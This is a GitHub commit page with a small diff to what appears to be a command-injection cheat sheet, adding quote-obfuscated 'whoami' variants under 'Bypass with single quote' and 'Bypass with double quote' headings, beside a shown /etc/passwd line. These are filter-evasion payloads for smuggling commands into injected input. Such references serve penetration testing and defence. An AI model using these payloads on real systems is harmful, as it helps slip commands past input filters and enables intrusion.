update quote evasion payloads

This commit is contained in:
Xhoenix 2024-09-06 19:09:46 +05:30 committed by GitHub
parent 80707e805b
commit 77f83c18b3
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash
```powershell
w'h'o'am'i
wh''oami
'w'hoami
```
#### Bypass with double quote
@ -273,6 +274,7 @@ wh''oami
```powershell
w"h"o"am"i
wh""oami
"wh"oami
```
#### Bypass with backticks